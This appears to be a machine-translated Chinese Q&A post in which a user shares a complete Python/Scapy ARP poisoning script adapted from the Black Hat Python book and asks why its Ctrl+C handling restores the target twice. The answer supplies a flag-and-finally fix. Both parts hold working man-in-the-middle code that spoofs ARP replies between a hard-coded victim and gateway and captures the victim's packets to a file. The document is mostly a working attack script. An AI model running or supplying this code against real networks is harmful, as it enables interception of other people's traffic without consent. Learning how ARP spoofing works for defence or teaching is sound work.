带有Python的ArpPoisoning，BlackHat图书

Question

我试着写了一个基于黑帽蟒蛇书的中毒程序！它工作得很好，而且每件事都很好，但是当我想用ctrl+c停止程序时，keybord中断异常就不起作用了！我的恢复目标运行了2次，因为它打印"*还原目标“显示了2次！这是我的全部代码：

from scapy.all import *
import os
import sys
import threading
import signal


interface = raw_input("Enter Interface name :> ")
target_ip = "192.168.43.180"
gateway_ip = "192.168.43.1"
packet_count = 10

conf.iface = interface
conf.verb = 0

def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    print "[*] Restoring Target..."
    send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
    os.kill(os.getpid(),signal.SIGINT)

def get_mac(ip_address):
    responses , unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
    for s,r in responses :
        return r[Ether].src
    return None

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print "[*] Begining ARP Poisoning:"
    while True:
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)

    print ".:ARP poison Attack Finished:."
    return


print ".: Setting Up %s :." % interface
gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "Failed to Get Gateway MAC..."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" %(gateway_ip,gateway_mac)
target_mac= get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)

poison_thread = threading.Thread(target = poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))
poison_thread.start()

try:
    print " \n[*] Start snifing for %d Packets \n" %packet_count
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
    wrpcap('arper.pcap',packets)
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)

Answer 1

好吧，我也有同样的问题。

问题是while True函数中的poison_target循环:这个循环从不退出。

在查看可下载代码之后，您将注意到与书中的代码有一些细微的差别。特别是，作者在主要错误处理中使用了poisoning全局和finally子句：

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    '''poison'''
    global poisoning
    --snip--
    print '[*] Begining the ARP poison. [CTRL-C to stop]'
    while poisoning:
        send(poison_t)
        send(poison_g)
        time.sleep(2)
    print '[*] ARP poison attack finished.'
    return

然后在主要代码中：

--snip--
poisoning = True
poison_thread.start()
try:
    --snip--
    packets = sniff(count=count, filter=bpf_filter, iface=interface)
except KeyboardInterrupt:
    pass
finally:
    --snip--
    poisoning = False

    time.sleep(2)

    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    --snip--